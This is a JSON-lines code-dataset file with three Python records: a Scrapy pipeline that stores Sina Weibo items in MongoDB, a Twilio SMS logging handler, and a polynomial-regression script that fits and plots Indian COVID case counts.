+{"seq_id":"309002932","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: https://docs.scrapy.org/en/latest/topics/item-pipeline.html\nimport pymongo\nfrom .items import SinaspiderItem,TweetsItem\n\nclass SinaspiderPipeline(object):\n def __init__(self):\n client = pymongo.MongoClient(host='127.0.0.1',port=27017)\n db = client['Sina']\n self.Information = db['Information']\n self.Tweets = db['tweets']\n\n def process_item(self, item, spider):\n # 判断item类型 然后入库\n if isinstance(item,SinaspiderItem):\n self.Information.insert(dict(item))\n else:\n self.Tweets.insert(dict(item))\n return item\n\n","sub_path":"35爬虫/新浪微博/SinaSpider/SinaSpider/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"571837253","text":"import logging\nimport time\nimport json \nimport platform\nfrom twilio.rest import TwilioRestClient\n\nclass TWHandler(logging.Handler):\n \"\"\"\n logging handler uses postmarkapp to send email at a given log level.\n \"\"\"\n\n def __init__(self, config):\n \"\"\"\n accepts {config}\n inititializes Handler\n \"\"\"\n self.config = config\n logging.Handler.__init__(self)\n\n def emit(self, record):\n \"\"\"\n accepts record logging message object\n \"\"\"\n for number in self.config[\"recipients\"]:\n try:\n self.send(number, record)\n except(KeyboardInterrupt, SystemExit):\n raise\n except:\n self.handleError(record)\n\n def send(self, number, record):\n \"\"\"\n accepts\n number string E.164 formated phone number (+19995551212)\n record logging message object \n\n uses twilio module to send\n \"\"\"\n\n body = json.dumps({\n \"host\": platform.node(),\n \"time\": record.asctime,\n \"logger name\": record.name,\n \"error level\": record.levelname,\n \"file\": record.pathname,\n \"module\": record.module,\n \"function\": record.funcName,\n \"message\": record.message,\n },\n indent=True\n )\n\n client = TwilioRestClient(\n self.config[\"sid\"],\n self.config[\"token\"],\n )\n\n message = client.messages.create(\n body = body,\n to = number,\n from_= self.config[\"From\"],\n )\n # we'll just reeeealy respect that rate limit. \n time.sleep(5)\n","sub_path":"TwilioHandler/TWHandler.py","file_name":"TWHandler.py","file_ext":"py","file_size_in_byte":1735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"392625299","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.preprocessing import PolynomialFeatures\nfrom sklearn import linear_model\ndata = pd.read_csv('owid-india-covid-data.csv', sep=',')\ndata = data[['id', 'total_cases']]\ndata.fillna(data.ffill(axis=0), inplace=True)\nx = np.array(data['id']).reshape(-1, 1)\ny = np.array(data['total_cases']).reshape(-1, 1)\npolyfeature = PolynomialFeatures(degree=6)\nx = polyfeature.fit_transform(x)\nmodel = linear_model.LinearRegression()\nmodel.fit(x, y)\naccuracy = model.score(x, y)\nprint(f'Accuracy:{round(accuracy * 100, 3)}%')\ny0 = model.predict((x))\ndays = 2\nplt.plot(y0, 'red')\nplt.plot(y, 'purple')\nplt.legend([\"Actual\", \"Predicted\"], loc =\"lower right\")\nplt.show()\nprint(f'Prediction - Cases after {days} days: ',end='')\nprediction = float(y0[-2]/1000000)\nprint(round(prediction, 2),'M')\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":857,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}